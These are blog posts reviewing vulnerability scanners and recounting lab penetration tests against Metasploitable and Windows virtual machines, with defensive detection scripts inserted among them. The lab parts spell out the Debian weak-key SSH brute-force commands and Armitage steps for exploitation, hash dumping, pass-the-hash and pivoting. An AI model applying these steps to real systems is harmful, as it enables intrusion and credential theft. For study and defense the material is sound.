Saturday, December 24, 2011

Vulnerability Assessment for Personal Computers

According to The Free On-line Dictionary of Computing (n.d.), a vulnerability is a bug or feature of a system that exposes it to possible attack, or a flaw in the system’s security.  As time goes on, it is very difficult for any individual to stay up-to-date on the latest vulnerabilities, notably with the number of zero-days being released and third-party software possibly opening new port(s) on your computer.  There are a variety of vulnerability scanners an individual can use to assess their system for flaws to patch.  The following blog post will discuss four great individual scanners; putting these scanners together creates a synergy that greatly benefits the user.
First is Nessus by Tenable at  It is free for home users and, according to their website, the product features high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture.  When I use this product, the output is incredibly easy to read and understand.  They label each vulnerability as high, medium, or low according to its criticality and ease of being exploited.
Nessus uses plug-ins that are vital to the program’s ability to scan your system for vulnerabilities.  The plug-ins are continuously updated, similar to the signatures anti-virus products use to detect new viruses on your computer.
The installation documentation is straightforward.  You may find it in PDF format at  The product is available for Windows and Linux.  In high-level terms, to install Nessus, you need to complete the following steps:
1.       Download the installer from
2.       Register for a key on the Nessus website by submitting your e-mail address.  Nessus will e-mail you a unique product key that can be used to register the product.
3.       Install the program.
4.       Create a Nessus user to access the system.
5.       Update the plug-ins.
Nessus uses a client/server architecture.  Once set up, the server runs quietly in the background and you interact with it through a browser.  Once you have installed the Nessus server, you can access it by opening a browser and entering the URL.  Log in with the username and password you created when installing the program.
From there, you set up a scan policy.  There are some pre-configured policies you may run, or you can manually set up a custom policy.  I usually don’t stray much from the pre-configured policy since I only scan my desktop computer and laptop.  Continue clicking “Next” until you reach the end of the policy and click the “Submit” button.  Go to the menu, click “Scan” and enter a name for your scan.  Select the pre-configured policy or the custom policy you just created, enter the IP addresses that you want to scan and click “Launch Scan.”  When the scan completes, you may click on “Reports” on the menu and view the results from the scan along with recommendations for any flaws found in your system.
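Besides viewing results in the browser, Nessus can export a scan as a “.nessus” XML file (the “NessusClientData_v2” format), in which every finding is a ReportItem under a ReportHost with a numeric severity attribute. The following is an added example, not code from the original post or from Tenable: it parses such an export and summarizes it by severity and by host, which is handy when you scan more than one or two machines. The XML embedded in it is a constructed sample in that format, not real scan output, and the plugin IDs and names are made up.

```python
"""Summarise a Nessus ".nessus" (v2 XML) export by host and severity.

Added example (not from the original post or from Tenable). The XML below is a
constructed sample in the NessusClientData_v2 layout; plugin IDs and names are
invented for the demo.
"""
import xml.etree.ElementTree as ET
from collections import Counter, defaultdict

# Nessus severity codes; the post's "high/medium/low" labels are 3/2/1.
SEVERITY_LABELS = {"0": "Info", "1": "Low", "2": "Medium", "3": "High", "4": "Critical"}

SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="home-lan">
    <ReportHost name="192.168.1.10">
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="3"
                  pluginID="100001" pluginName="Constructed: SMB server missing patches">
        <solution>Apply the vendor patches.</solution>
      </ReportItem>
      <ReportItem port="80" svc_name="www" protocol="tcp" severity="2"
                  pluginID="100002" pluginName="Constructed: web server version disclosure">
        <solution>Disable the server banner.</solution>
      </ReportItem>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="100003" pluginName="Constructed: OS identification">
        <solution>n/a</solution>
      </ReportItem>
    </ReportHost>
    <ReportHost name="192.168.1.11">
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="1"
                  pluginID="100004" pluginName="Constructed: SSH weak MAC algorithms">
        <solution>Restrict the MAC list in sshd_config.</solution>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Return a list of findings, one dict per <ReportItem>."""
    # For files from an untrusted source use defusedxml; this sample is local and constructed.
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port")),
                "protocol": item.get("protocol"),
                "severity": SEVERITY_LABELS.get(item.get("severity"), "Unknown"),
                "plugin_id": item.get("pluginID"),
                "name": item.get("pluginName"),
                "solution": (item.findtext("solution") or "").strip(),
            })
    return findings


def severity_counts(findings):
    """Count findings per severity label, leaving out informational items."""
    return Counter(f["severity"] for f in findings if f["severity"] != "Info")


def hosts_needing_attention(findings, at_least=("High", "Critical")):
    """Map each host to the names of its High/Critical findings; clean hosts are omitted."""
    result = defaultdict(list)
    for f in findings:
        if f["severity"] in at_least:
            result[f["host"]].append(f["name"])
    return dict(result)


if __name__ == "__main__":
    found = parse_nessus(SAMPLE_NESSUS)
    print(severity_counts(found))
    for host, names in hosts_needing_attention(found).items():
        print(host, "->", "; ".join(names))
```

Run it against a real export by replacing SAMPLE_NESSUS with the file contents; the per-host “High” list is the patch queue the post describes reading off the Reports page.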
Next is Microsoft Baseline Security Analyzer (MBSA).  This tool is absolutely amazing for the Microsoft operating system and products.  Overall, Nessus is a better vulnerability scanner in my opinion, but to determine the true security posture of your Windows system, MBSA will produce a detailed report.  You may download the program at  Microsoft explains the product as follows (“Microsoft baseline security,” n.d.):
Microsoft Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT professional that helps small- and medium-sized businesses determine their security state in accordance with Microsoft security recommendations and offers specific remediation guidance. Improve your security management process by using MBSA to detect common security misconfigurations and missing security updates on your computer systems.
Although Microsoft’s website explains that the product was made for IT professionals to help small and medium-sized businesses, I believe it can immensely help individuals secure their personal computers.  I use the tool about once a month and the accuracy of the report is great.
Click “Scan a computer” and enter the IP address of your computer.  You may find the IP address by going to Start/Run (or typing ‘cmd’ in the search box), typing ‘ipconfig’ and pressing Enter.  Enter the IPv4 address and click “Start Scan” at the bottom right of the screen.
If an error comes up because a certain service is not running, click Start and type “services.msc” in the search box or in “Run” and hit Enter.  Find the service named “Server” and start it; you can confirm in the Status column that it has started.  I believe this service is started by default, but I disable it on my desktop.  Repeat the previous steps to start the scan over.  The end result will allow you to download a PDF report to review.  The report will give you statuses on Windows updates, Microsoft’s own software updates (e.g., Office), system standard compliance (depending on the software installed), administrative vulnerabilities (e.g., passwords, firewall, file system, etc.), and additional vulnerability assessment.  It is an incredible tool for Microsoft Windows and Microsoft products.
So far, Nessus is for your system as a whole and MBSA is for the Windows operating system and Microsoft products.  Lastly are Secunia and FileHippo for third-party software (i.e., software not from Microsoft).  Secunia has a product called Personal Software Inspector (PSI), free to download at   The product patches insecure programs and helps safeguard your data and PC against cybercriminals.  According to Secunia’s website, it is a security scanner which identifies programs that are insecure and need updates.  It even automates the updating of many of these programs, making it a lot easier to maintain a secure PC.  FileHippo is a similar program to Secunia PSI.  It scans your computer and lists which programs are in need of an update.
Secunia PSI and FileHippo take the worry out of wondering whether third-party software is in need of an upgrade.  Today, users download so much software that it is understandably difficult to update each one or, worse, some of it is left unpatched for a period of time.  Download and use these tools to your advantage and keep your personal computer safe by adding this extra layer of security.  :)
1.       Microsoft Baseline Security Analyzer (MBSA) legacy product solution. (n.d.). Retrieved from
2.       Free computer security - Personal Software Inspector (PSI) - Secunia. (n.d.). Retrieved from
3.       Vulnerability. (n.d.). The Free On-line Dictionary of Computing. Retrieved December 23, 2011, from website:

The video covers the use of Nessus, MBSA, Secunia, and FileHippo.  It is meant to demonstrate their functionality and how each one serves a different purpose in helping users become safer on the Internet.
I will be using Nessus through BackTrack 5 to scan my Windows 7 machine.  I have already registered for Nessus, so that part will not be shown.  For MBSA, Secunia, and FileHippo, I will be using my personal computer to scan itself.
As you will see in the video, each product produces different results.  FileHippo stated that my computer was up-to-date, but Secunia found third-party software that needed to be patched.  One product is not better than the other; I believe both products are needed for personal computers.  For MBSA, it takes time to scan the computer and download updates.  Be patient and the results will come.  Nessus is a great tool; there is not much to comment on.  It is laid out great and easy to follow.
Thank you for reading and/or watching the video.  Look to the right for my other personal profiles.  I have accounts for: Twitter, Facebook, LinkedIn, YouTube, and I plan to sign up for Google+.  Please follow or continue to follow.  Thank you.

Note: IE won't play Vimeo (at least on my computer), so I will post both YouTube and Vimeo.  Firefox users, I prefer Vimeo.  IE users have to use YouTube, the direct link to the video.

Thursday, December 22, 2011


I read Metasploit: The Penetration Tester’s Guide.  It was an incredibly well-written book.  The book gave me a better understanding of the Metasploit Framework and the ability to take full advantage of the Framework and its exploits.  Chapter 17 consisted of a “simulated penetration test” against the vulnerable Linux machine called Metasploitable (torrent).  Metasploitable is meant for applying the techniques learned in the previous chapters to crack the machine and acquire full control with administrative access.  This blog post will consist of two parts.  The first will demonstrate the steps I took to get control of the vulnerable Metasploitable machine, and the second part will give a brief description of the Metasploit Framework and its layout in BackTrack 5.
The basic methodology for a penetration test consists of:
·         Reconnaissance
·         Scanning (Port and Vulnerability)
·         Exploitation
·         Maintaining Access
·         Post-Exploitation
For this demo, I will be using VMware Workstation for the BackTrack 5 (attacker) and Metasploitable (victim) virtual machines.
First, I’ll scan the network for live hosts from BackTrack 5 with the Nmap (network mapper) tool.  I will use the command:
With the results, I discovered a live host with an abnormal number of open ports running on To further probe those ports for running services and version detection, I’ll apply the command:
nmap -sS -A
·         -sS is a TCP SYN scan.  An open port answers the SYN with a SYN-ACK packet, which reveals that it is open.  To further understand this process, research the three-way handshake for TCP.
·         -A means aggressive.  It combines -O for OS detection, -sV for version detection, -sC to run the default scripts, and --traceroute for the path to the host.  -A is great.
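The flip side of the SYN scan is what it looks like on the wire from the scanned host: one source sends a bare SYN to many ports and never sends the final ACK of the three-way handshake, whether the port answers SYN-ACK (open) or RST (closed). The following is an added example, not code from the original post or from Nmap: it takes constructed packet summaries (source, destination, port, TCP flags) and flags source/destination pairs with many half-open SYNs, while a normal client that completes the handshake to one port is left alone.

```python
"""Flag SYN-scan behaviour in a constructed TCP packet log.

Added example (not from the original post or from Nmap). A stealth SYN scan
(nmap -sS) sends a SYN per port and reads the SYN-ACK or RST reply, but never
sends the final ACK. From the defender's side that is one source touching many
ports on a host with SYNs that are never followed by an ACK. The records below
are constructed for the demo; flags are spelled the way packet summarisers
print them (S = SYN, SA = SYN-ACK, A = ACK, R = RST, RA = RST-ACK).
"""
from collections import defaultdict

# Constructed packet summaries: (src, dst, dst_port, tcp_flags).
PACKETS = [
    ("10.0.0.5", "10.0.0.20", 22, "S"),
    ("10.0.0.20", "10.0.0.5", 22, "SA"),
    ("10.0.0.5", "10.0.0.20", 22, "R"),     # scanner tears down, never ACKs
    ("10.0.0.5", "10.0.0.20", 80, "S"),
    ("10.0.0.20", "10.0.0.5", 80, "SA"),
    ("10.0.0.5", "10.0.0.20", 80, "R"),
    ("10.0.0.5", "10.0.0.20", 135, "S"),
    ("10.0.0.20", "10.0.0.5", 135, "RA"),   # closed port answers RST-ACK
    ("10.0.0.5", "10.0.0.20", 139, "S"),
    ("10.0.0.5", "10.0.0.20", 445, "S"),
    ("10.0.0.5", "10.0.0.20", 8180, "S"),
    # A legitimate client completing a full handshake to port 80.
    ("10.0.0.7", "10.0.0.20", 80, "S"),
    ("10.0.0.20", "10.0.0.7", 80, "SA"),
    ("10.0.0.7", "10.0.0.20", 80, "A"),
]


def syn_scan_suspects(packets, min_ports=5):
    """Return {(src, dst): sorted half-open ports} for every source that sent
    bare SYNs to at least `min_ports` distinct ports on a host and never
    completed the handshake (no pure ACK from the same source to that port)."""
    syn_ports = defaultdict(set)
    acked_ports = defaultdict(set)
    for src, dst, port, flags in packets:
        if flags == "S":
            syn_ports[(src, dst)].add(port)
        elif flags == "A":  # third step of the handshake, sent by the client
            acked_ports[(src, dst)].add(port)
    suspects = {}
    for pair, ports in syn_ports.items():
        half_open = ports - acked_ports[pair]
        if len(half_open) >= min_ports:
            suspects[pair] = sorted(half_open)
    return suspects


if __name__ == "__main__":
    for (src, dst), ports in syn_scan_suspects(PACKETS).items():
        print(f"{src} -> {dst}: SYN to {len(ports)} ports without handshake: {ports}")
```

A connect scan (nmap -sT) completes the handshake, so it would not trip this rule; it shows up instead as many short-lived full connections, which is why host-based firewall logs and IDS rules typically count distinct ports per source over a time window rather than relying on flags alone.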
Through this probe, I find a couple of Apache servers running.  I determine whether there are any websites running on those ports.  Unfortunately, there are not; both are running default pages for the Apache and Tomcat servers.  My next move is to further analyze the SSH port since it has a version number and type.  I do a search on The Open Source Vulnerability Database with the assumption that everything running on this system is unpatched.
When I conduct a search for “Debian on OpenSSL” it leads me to a vulnerability for cryptographic weakness.  I click on the ID, 45029.  From there, I usually look for a link to Exploit-DB.  They have an incredible number of exploits explaining how the exploits work.  Off topic, they have informative papers written by individuals interested in the field.  Beginners to experts can benefit from skimming through the papers of their interest.
I click on the link next to Exploit Database: 5720.  It leads me directly to an exploit for “Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python).”
A Perl script was made to use precalculated SSH keys to brute force the SSH login prompt.
I will execute the script:
python /root/Desktop/rsa/2048 root 22 5
·         Python is the language of the code and is needed to execute it
·         The directory is where the keys are stored for the script to read
·         root is the username
·         22 is the port of SSH
·         5 is the number of tasks it is able to run at one time.  Instead of running one login attempt at a time, the attacker can run multiple logins in parallel.  Although, it is not good to set this number too high.  Keep it reasonable.
After reviewing the script, I learned that the vulnerability was caused by Debian’s OpenSSL only being able to generate roughly 65,536 possible keys.  Obviously, this means an attacker with enough keys can brute force their way into the system given enough time.
The comments in the script lay out, in sequential order, how to exploit this system.
2.       Once downloaded, type the command: tar -jxvf debian_ssh_rsa_2048_x86.tar.bz2
3.       Hit enter to extract it to the current directory.
4.       The contents are the SSH keys needed to brute force the system
5.       Type command: python *the directory of the rsa keys *the target IP address root 22 5
a.       Ex: python /root/Desktop/rsa/2048 root 22 5
6.       Once the key is found, type the command: ssh -lroot -p22 -i *directory of the keys/*the key that was found *target IP address
a.       You will be able to copy and paste the result. When the scan is over, it will give you the exact command you need to crack the system.
b.      Ex: ssh -lroot -p22 -i /root/Desktop/rsa/2048/*Found key

I apologize, but for some odd reason Vimeo is not working in Internet Explorer.  I tried with multiple users and each user was unable to view my video.  I really liked their service in comparison to YouTube.  Until I find Vimeo working on Internet Explorer, I will be posting my YouTube videos.  My YouTube videos have music playing in the background.  If that seems annoying, please go to my Vimeo page for this blog and view it in Firefox, or scroll to the bottom of the page for the embedded Vimeo video (Firefox only).  Thank you, and afterwards be sure to continue reading to gain a further understanding of the amazing Metasploit exploitation framework.

I do not know the reason but the YouTube video is nearly 7 minutes longer; although, it contains the same content.

In short, the vulnerability was caused by the limited number of "random" keys generated.  For this program, an attacker had a 1 in 2 to the power of 15 chance of choosing the correct key (1 in 32,768).  With today's computing power, it takes no effort to pick the correct key.  Usually programs have at least 2 to the power of 1024 possibilities, which equals 1.797693134862315907729305190789e+308.  It's kind of surprising that they would leave that line of code in there, but oh well. :)  It makes it fun to crack.
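Because every affected key came from a tiny, enumerable set, the fix on the defending side was not only to regenerate keys but to refuse the known-weak ones: Debian shipped a blocklist of their fingerprints (the openssh-blacklist package, checked by ssh-vulnkey) so that sshd and administrators could reject them outright. The following is an added example, not code from the original post or from Debian/OpenSSH, that reproduces the idea: it parses OpenSSH public-key lines, computes their fingerprints, and flags any key whose fingerprint is on a blocklist. The two keys and the blocklist are constructed for the demo; the “RSA” values are just small integers packed in the correct ssh-rsa wire format, not real keys.

```python
"""Check SSH public keys against a blocklist of known-weak key fingerprints.

Added example (not from the original post or from Debian/OpenSSH). Models the
approach used for the Debian OpenSSL weak keys: compute each key's fingerprint
and reject it if the fingerprint is on a vendor-supplied list. The keys and the
blocklist below are constructed; the "RSA" numbers are small integers in the
right wire format, not real moduli.
"""
import base64
import hashlib
import struct


def _ssh_string(data: bytes) -> bytes:
    """Encode an SSH wire-format string: 4-byte big-endian length + bytes."""
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(value: int) -> bytes:
    """Encode a positive integer as an SSH mpint (leading zero byte if the high bit is set)."""
    raw = value.to_bytes((value.bit_length() + 8) // 8, "big")
    return _ssh_string(raw)


def make_rsa_pubkey_line(e: int, n: int, comment: str) -> str:
    """Build an 'ssh-rsa <base64 blob> <comment>' line from the pair (e, n)."""
    blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}"


def parse_pubkey_line(line: str):
    """Return (key_type, blob_bytes, comment) for one id_rsa.pub / authorized_keys line."""
    parts = line.split(None, 2)
    if len(parts) < 2 or not parts[0].startswith(("ssh-", "ecdsa-")):
        raise ValueError("not a plain public-key line: %r" % line)
    key_type, b64 = parts[0], parts[1]
    comment = parts[2].strip() if len(parts) == 3 else ""
    blob = base64.b64decode(b64)
    # The blob begins with the key type as an SSH string; it must match the text prefix.
    (type_len,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + type_len] != key_type.encode():
        raise ValueError("key type mismatch in %r" % comment)
    return key_type, blob, comment


def fingerprint_md5(blob: bytes) -> str:
    """Legacy colon-separated MD5 fingerprint (what ssh-keygen -l printed in 2011)."""
    hexdigest = hashlib.md5(blob).hexdigest()
    return ":".join(hexdigest[i:i + 2] for i in range(0, len(hexdigest), 2))


def fingerprint_sha256(blob: bytes) -> str:
    """Modern 'SHA256:<unpadded base64>' fingerprint used by current OpenSSH."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def check_keys(lines, blocklist):
    """Return [(comment, md5_fingerprint, blocked)] for each public-key line,
    skipping blank lines and comments."""
    results = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        _, blob, comment = parse_pubkey_line(line)
        fp = fingerprint_md5(blob)
        results.append((comment, fp, fp in blocklist))
    return results


# Constructed keys (not real RSA moduli). WEAK_KEY stands in for a key from the
# enumerable Debian set; GOOD_KEY for a key generated on a patched system.
WEAK_KEY = make_rsa_pubkey_line(65537, 0xC0FFEE0BADF00D1234567890ABCDEF, "weak@debian-etch")
GOOD_KEY = make_rsa_pubkey_line(65537, 0xFEEDFACEDEADBEEF0011223344556677, "ok@laptop")

# A real blocklist ships from the vendor; this one is constructed from WEAK_KEY's fingerprint.
BLOCKLIST = {fingerprint_md5(parse_pubkey_line(WEAK_KEY)[1])}

if __name__ == "__main__":
    for comment, fp, blocked in check_keys([WEAK_KEY, "# a comment line", GOOD_KEY], BLOCKLIST):
        print(f"{comment:20} {fp}  {'REJECT' if blocked else 'ok'}")
```

The point of fingerprinting the whole blob rather than storing the keys themselves is that a blocklist of a few hundred thousand fingerprints is small enough to ship to every host, while the same check run over authorized_keys and known_hosts files finds weak keys wherever they were copied.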

Metasploit is a free and open source framework for exploitation.  Msfconsole and msfcli are the user interfaces that Metasploit offers, and Armitage is the GUI for Metasploit.  Metasploit allows exploiting a vulnerable system through different methods and maintaining interaction with and control of that system.  The Framework’s directory is well organized and stocked with the latest exploits for a variety of systems and numerous payloads to deliver.
An exploit is a piece of code that can take advantage of a system’s vulnerability.  A vulnerability includes unpatched software or operating systems, poorly written third-party software, etc.  A payload is a piece of code that executes something on the victim’s machine as a result of the exploit.  For example, the attacker would exploit a vulnerable system to gain the advantage of controlling that system.  With this advantage, the attacker will send a payload (written code) for the system to execute and give the attacker interactive capabilities.  The interactive capabilities include a shell prompt (similar to the command prompt in Windows), VNC (virtual network computing) access (similar to Remote Desktop in Windows), and dozens more.
To access the framework and view the contents in BackTrack 5, change directories as follows:
cd /pentest/exploits/framework
·         Documentation includes information about how to use the various aspects of Metasploit.
·         Msfconsole provides an all-in-one interface to almost every option and setting available in the Framework (Kennedy, O'Gorman, Kearns & Aharoni, 2011).
·         Msfcli runs directly from the command line.
·         Msfupdate updates the Framework with the latest exploits.

cd modules
·         Auxiliary modules are associated with scanning for vulnerable systems.
·         Exploits allow an attacker to take advantage of a flaw within a system, an application, or a service (Kennedy, O'Gorman, Kearns & Aharoni, 2011).  They are organized by operating system, such as Linux, Solaris, UNIX, Windows, and others.
·         Payload is a selected code from the Framework and delivered by the attacker for the targeted system to execute.

 Under the “windows” directory for exploits, you will be able to view a wide range of exploits.  The useful ones include:
·         dcerpc which stands for Distributed Computing Environment Remote Procedure Call.  This will allow an attacker remote access to the system.
·         browser for client-side exploits for Internet Explorer, RealPlayer, Facebook, Quicktime, iTunes, etc.  It’s a huge list.
·         iis (Internet Information Services) includes server-side exploits for Microsoft’s web server.
·         smb (Server Message Block) for server-side exploits.
Under “payloads” in the modules directory, you will see directories for singles, stagers, and stages.
·         Singles are stand-alone payloads.  The functionality of the payload and its communication with the attacker are bundled together.  For Windows, an attacker will be able to add a user, obtain an interactive shell, download files, etc.
·         Stagers are small pieces of code loaded into memory that set up communication with the attacker.  This includes listening on a TCP port or connecting back over a TCP port, among others.
·         Stages are the end result of payload functionality.  This includes a remote shell, a Meterpreter session, a VNC session for GUI control, etc.

1.       Kennedy, D., O'Gorman, J., Kearns, D., & Aharoni, M. (2011). Metasploit: The penetration tester's guide. No Starch Press.

Thank you to the authors for a great book. However, I’m still a work in progress in trying to get past the self-conscious feeling of being a script-kiddie.  My next move is to gain a better understanding of the C language and Assembly language.  I bought the book Hacking: The Art of Exploitation, and I plan on reading Gray Hat Hacking 3rd Edition.  Thank you to the security community for the amount of knowledge you have passed on for me and others to learn.

Metasploitable from Surapheal Belay on Vimeo.

Wednesday, October 26, 2011

Illustrating the Process of a Network Attack with Armitage

This post will demonstrate the same attack as the previous post, but through Metasploit’s GUI front-end tool named Armitage.  An attacker is able to discover hosts or scan a network with the integrated Nmap tool and obtain an automated list of vulnerabilities for each host depending on the open ports/services running; subsequently the attacker will just point and click to exploit a vulnerability from the list that is provided and transmit a payload to compromise and control the victim.  The following phase is where I feel Armitage is better than ‘msfconsole.’
Armitage has great benefits in the ‘post-exploitation’ phase.  One, an attacker is able to interact with multiple machines at once, versus having to ‘background’ a meterpreter session to interact with another.  Another benefit of Armitage is the incredible ease of browsing files and downloading/uploading files to the victim’s computer.  Lastly, an attacker would be able to pivot (hop) to networks that were not directly accessible.
Below is a graphical illustration of the process an attacker would use with the Armitage tool.

Now, onto the demonstration.  The following explains the network setup:
First Network (
·         BackTrack 5  
·         Windows XP SP3
·         Windows 7   
Windows 2003 web server with two interfaces; each facing a different network.
· /
Second Network (
·         Windows XP SP2
Host Discovery (Information Gathering)
o Start Armitage by going to BackTrack/Exploitation Tools/Network Exploitation Tools/Metasploit Framework/armitage
o Click ‘Start MSF’
o Select Hosts/Nmap Scan/Quick Scan (OS detect)
o Enter your target network and click ‘OK’. I entered the ‘First Network,’
o Wait until the pop-up message displays ‘Scan Complete!’ and click ‘OK.’
o A graphical icon list – depending on OS – will be displayed.
Analyze Scan Data for Exploits and Determine a Remote Attack or Client-Side Attack
o Go to the menu and select Attacks/Find Attacks/by port
Attack by ports is selected since we performed an Nmap scan, which gathered a list of open ports and services running.
You would select ‘by vulnerability’ if a completed vulnerability scan, such as, Nessus would have been imported.
o Wait until a pop-up message is displayed stating ‘Attack Analysis Complete…’ and click ‘OK’
From here, you can go to any host and right-click to select ‘Attack’ to view a list of vulnerabilities and the menu to the right will list known exploits for those vulnerabilities.
o I right-clicked on the ‘’ (Windows 2003) machine and selected the ‘ms08_067_netapi’ exploit.  This exploit never fails at owning/compromising a Windows XP or Windows 2003 machine.  Click ‘Launch’ to transmit the payload for a meterpreter session.
o I chose the same exploit for ‘’ (Windows XP SP3).
Post-Exploitation Phase
o Now, I will perform ‘post-exploitation’ on the compromised hosts.
o For the, I migrated to a different task by right-clicking on the host and selecting Meterpreter/Access/Migrate Now!
o On the same host (, I right-clicked and selected Meterpreter/Interact/Run VNC.
o A pop-up message will display the port to connect to a VNC session.
o I open a ‘Konsole’ and type the command vncviewer[port]. The port changes every time you select to run a VNC session.
o Press enter, and TightVNC or the VNC program you have installed will open.  You will be able to have complete view and control of the victim’s machine.  Well, the meterpreter session gives the attacker complete control, especially with the greater amount of scripts an attacker is able to run in ‘msfconsole.’  Anyways, I pulled up the host next to the VNC session for further clarity.
o For the, I will browse the directories on the computer by right-clicking on the host and selecting Meterpreter/Explore/Browse Files.  Armitage displays a great graphical interface to browse the files; along with the capability of downloading or uploading files.
o Next, I will display the capability of taking a screenshot of the victim’s computer by right-clicking and selecting Meterpreter/Explore/Screenshot.
o After that, I will dump (collect) the user names and hashes (passwords) by right-clicking on the host and selecting Meterpreter/Access/Dump Hashes/lsass method.
o Wait for the pop-up message that states ‘Hashes dumped’ and click ‘OK.’  To display them, go to the menu and click View/Credentials.
o Conveniently, the attacker is able to try and crack the passwords by selecting ‘Crack Passwords’ and using the default wordlist or loading a custom wordlist.
o Luckily, with Windows machines, we can perform a technique called ‘Pass the Hash.’  There is no need to know the password; if the attacker has the username with the correct hash, that will be enough to gain authorization.
Network Pivoting
o Once the attacker has reached a goal with the compromised hosts or determines there isn’t anything of value, an ARP scan would be the next logical step to determine if the hosts are connected to other networks that are not directly accessible to the attacker.

An ARP (Address Resolution Protocol) scan sends request packets to hosts within the local area network to determine the MAC (hardware) address of each host from its known IP (Internet Protocol) address.

o I right-click on the host since it was a server and select Meterpreter/ARP Scan.
o On the pop-up, I select the unknown network ( to view a list of hosts IP addresses and MAC addresses.
In essence, we are now starting the attack process again.  We discovered new hosts, then we analyze the open services and vulnerabilities, then determine the exploit.  Pivoting allows an attacker to go deep into the network.
Next, I need to set up a pivot.  Through this method, I will set a stager on the server, which will allow me to appear as an authorized user on the server in order to interact with the other hosts.
o Right-click the Windows 2003 ( and select Meterpreter/Pivoting/Setup.
o Select the second network ( and click ‘Add Pivot.’
o The pivot will be successful when a pop-up message states ‘Route added.’  You will see the Windows 2003 displaying an arrow to each of the hosts in the new network.
Hit Ctrl+H to display a clearer connection from the 2003 Server to the newly discovered hosts.
Now, we need to scan the unknown hosts to determine the OS and open services running.
o Right-click on an unknown host and click ‘scan’ and click ‘OK’ for the pop-up message.
o I right-click the host and select Login/psexec.  This will allow me to perform the ‘Pass the Hash’ technique on the host with previously collected usernames and hashes.
I wait until the process is complete to find successful login information.
o I right-click the host and select Login/psexec.  I select the successful user and pass login and click ‘Launch.’
o With the correct username/hash (password), I will have authorization over the machine.
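On the defending side, the Pass the Hash and psexec steps above (the Dump Hashes/Crack Passwords step and the Login/psexec step) leave a recognizable trace on the target host: a network logon authenticated with NTLM (Security event 4624, LogonType 3) followed within seconds by a new service being installed (System event 7045), and the same remote address repeating that on host after host. The following is an added example, not code from the original post or from Metasploit/Armitage, that correlates those two events over constructed event records. The field names (LogonType, AuthenticationPackageName, IpAddress, TargetUserName, ServiceName, ImagePath) are the real Windows event fields; the hosts, addresses, timestamps and service names are constructed.

```python
"""Flag psexec-style lateral movement in constructed Windows event records.

Added example (not from the original post or from Metasploit/Armitage). On the
host being logged into, pass-the-hash with psexec appears as a network logon
(Security 4624, LogonType 3, NTLM) followed shortly by a service install
(System 7045) on the same host. The records below are constructed; field names
follow the Windows event schema.
"""
from collections import defaultdict

# Constructed events: (epoch seconds, reporting host, event id, event data).
EVENTS = [
    # Interactive console logon (LogonType 2): not lateral movement.
    (1000, "WS1", 4624, {"LogonType": "2", "AuthenticationPackageName": "Negotiate",
                         "TargetUserName": "alice", "IpAddress": "-"}),
    # NTLM network logon from one address, then a service installed 12 s later.
    (2000, "SRV2003", 4624, {"LogonType": "3", "AuthenticationPackageName": "NTLM",
                             "TargetUserName": "Administrator", "IpAddress": "192.168.56.101"}),
    (2012, "SRV2003", 7045, {"ServiceName": "constructed-svc-1",
                             "ImagePath": "%SYSTEMROOT%\\constructed-1.exe"}),
    # The same remote address repeats the pattern on a second host.
    (2100, "XPSP2", 4624, {"LogonType": "3", "AuthenticationPackageName": "NTLM",
                           "TargetUserName": "Administrator", "IpAddress": "192.168.56.101"}),
    (2105, "XPSP2", 7045, {"ServiceName": "constructed-svc-2",
                           "ImagePath": "%SYSTEMROOT%\\constructed-2.exe"}),
    # Ordinary file-share access over NTLM with no service install: benign alone.
    (3000, "FS1", 4624, {"LogonType": "3", "AuthenticationPackageName": "NTLM",
                         "TargetUserName": "bob", "IpAddress": "192.168.56.50"}),
    # Service install with no preceding network logon (local software install).
    (4000, "WS1", 7045, {"ServiceName": "VBoxService",
                         "ImagePath": "C:\\Windows\\System32\\VBoxService.exe"}),
]


def correlate_remote_service_installs(events, window_seconds=60):
    """Pair each 7045 service install with NTLM network logons (4624, type 3) on
    the same host within the preceding window. Returns one alert per pair."""
    recent_logons = defaultdict(list)   # host -> [(time, source_ip, user)]
    alerts = []
    for ts, host, event_id, data in sorted(events, key=lambda e: e[0]):
        if (event_id == 4624 and data.get("LogonType") == "3"
                and data.get("AuthenticationPackageName") == "NTLM"):
            recent_logons[host].append((ts, data["IpAddress"], data["TargetUserName"]))
        elif event_id == 7045:
            for logon_ts, src, user in recent_logons[host]:
                if 0 <= ts - logon_ts <= window_seconds:
                    alerts.append({"host": host, "source": src, "user": user,
                                   "service": data["ServiceName"],
                                   "image": data["ImagePath"], "lag": ts - logon_ts})
    return alerts


def sources_touching_many_hosts(alerts, min_hosts=2):
    """Remote addresses whose logon-plus-service-install pattern landed on several
    hosts: the signature of one credential (or one hash) reused across the network."""
    hosts_by_src = defaultdict(set)
    for alert in alerts:
        hosts_by_src[alert["source"]].add(alert["host"])
    return {src: sorted(hosts) for src, hosts in hosts_by_src.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    found = correlate_remote_service_installs(EVENTS)
    for a in found:
        print(f"{a['host']}: {a['user']} from {a['source']} installed {a['service']} "
              f"{a['lag']}s after NTLM network logon")
    print("sources hitting multiple hosts:", sources_touching_many_hosts(found))
```

The window and the NTLM filter are the tunable parts: legitimate remote administration produces the same two events, so in practice the alert is scored higher when the source is a workstation rather than a management host, when the service image path is under a writable or randomly named location, and when the same source repeats the pattern across hosts as sources_touching_many_hosts reports.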
I forgot to compromise the Windows 7 machine and decided to do it at that moment.
o Go to the menu and select Attacks/Browser Autopwn
